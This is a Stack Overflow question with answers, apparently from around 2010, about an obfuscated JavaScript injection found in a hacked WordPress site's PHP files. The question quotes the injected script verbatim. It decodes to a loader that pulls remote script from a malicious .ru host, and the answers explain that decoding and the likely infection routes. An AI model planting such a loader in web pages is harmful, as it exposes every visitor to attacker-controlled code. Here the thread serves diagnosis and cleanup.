# Iframe malicious code in PHP files?

Tags: javascript, jquery, html, iframe, virus

I found the following code in PHP files in my website. I think someone just able to hack my ftp or with some way he's able to add this script in my PHP files, don't know how.

```
<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->
```

But I want to know the meaning of above code, I suppose it is encrypted in HTML format or in some other form, but what the above code is actually doing and how someone able to inject it in my website??

Thanks.

Answer (score 2, accepted):

The above script src results in the address `http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/`

It got into your files either via a security hole in your web site / scripts or directly via ftp.

Make sure to clean your files from this malicious code as soon as possible, change your ftp passwords and fix your security flaws!

Comment: I can do 1st 2 things easily but what about "fix your security flaws" what type of flaws I look into my code. What are the possible ways using which this code can be injected and how? because how they are able to write into my files directly from my website?

Comment: @Prashant It sounds like you essentially need to read up on network security. The ways someone could attack your server and change the files are very numerous. It could be through your PHP code, it could be through an exploit in your webserver (or mail server etc.), it  could even be that they got your passwords through spyware on your development system.  Are you running your own server, or are you on managed/shared hosting? Are you using anything like Wordpress or a web framework? Are you using FTP (which sends your password in clear text) or sftp?

Comment: If you run any application like a forum or a image gallery, try to upgrade to the latest version. Those applications do often have security holes that can easily be found and exploited since the sources are publicly available.

Comment: Yes I am running Wordpress and I think its injected from there, because I was running wp 2.8.3 whereas wp's current version is 2.9.1 this is helpful blog post: http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

Answer (score 0):

I don't think it does anything. It has the same URL [Alex posted](https://stackoverflow.com/questions/2214799/iframe-malicious-code-in-php-files/2214813#2214813), so I'm not going to repeat it here.

When I tried retrieving it with `curl` with a user agent header of IE6, logging headers to a file, I got these headers:

```
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Feb 2010 21:37:13 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 2
```

Additionally, the content of the file seemed to be just a CRLF. Nothing very special.

I don't know why they put it there, but perhaps there used to be something malicious, but now there isn't... or they're just waiting for some time to put some malicious code there.